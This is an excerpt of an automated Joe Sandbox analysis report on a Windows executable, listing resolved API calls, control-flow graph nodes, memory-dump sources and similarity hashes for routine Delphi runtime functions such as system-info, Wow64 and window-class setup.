• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2252812187-1888249752
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4450c5f0f43cc16413f68c5de3a1580e1c492cb8cc182c6ab933424faa411036
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4450c5f0f43cc16413f68c5de3a1580e1c492cb8cc182c6ab933424faa411036
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 365 4834fc-483521 GetModuleHandleA GetProcAddress 366 483588-48358d GetSystemInfo 365->366 367 483523-483539 GetNativeSystemInfo GetProcAddress 365->367 368 483592-48359b 366->368 367->368 369 48353b-483546 GetCurrentProcess 367->369 370 4835ab-4835b2 368->370 371 48359d-4835a1 368->371 369->368 378 483548-48354c 369->378 374 4835cd-4835d2 370->374 372 4835a3-4835a7 371->372 373 4835b4-4835bb 371->373 376 4835a9-4835c6 372->376 377 4835bd-4835c4 372->377 373->374 376->374 377->374 378->368 380 48354e-483555 call 452708 378->380 380->368 383 483557-483564 GetProcAddress 380->383 383->368 384 483566-48357d GetModuleHandleA GetProcAddress 383->384 384->368 385 48357f-483586 384->385 385->368
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                                                                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2230631259-2623177817
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a56589ab7a1b006cd470a658b4e564a4f23d6d600cc10ba5a87b0db1f3264359
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a56589ab7a1b006cd470a658b4e564a4f23d6d600cc10ba5a87b0db1f3264359
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 579 406334-40634e GetModuleHandleA GetProcAddress 580 406350 579->580 581 406357-406364 GetProcAddress 579->581 580->581 582 406366 581->582 583 40636d-40637a GetProcAddress 581->583 582->583 584 406380-406381 583->584 585 40637c-40637e SetProcessDEPPolicy 583->585 585->584
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 183575631-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004782E8
                                                                                                                                                                                                                                                                                                                                                                  • GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC), ref: 00478301
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Handle$File$AddressAttributesCloseCreateFinalModuleNamePathProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 873032407-2318956294
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b7da7a124424d5cacaca83f999ecaf76e7f5cdcc60deb679019968f5c2a89327
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7da7a124424d5cacaca83f999ecaf76e7f5cdcc60deb679019968f5c2a89327
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 590a72199e55668467d6112f9e57f701d07af2651b2519b3ef49fb4686bc15e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 590a72199e55668467d6112f9e57f701d07af2651b2519b3ef49fb4686bc15e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                                                                                                                                                                                                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4130936913-2943970505
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                                                                                                                                                                                                                                  • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                                                                                                                                                                                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 2$MAINICON
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3935243913-3181700818
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1580766901-2767913252
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
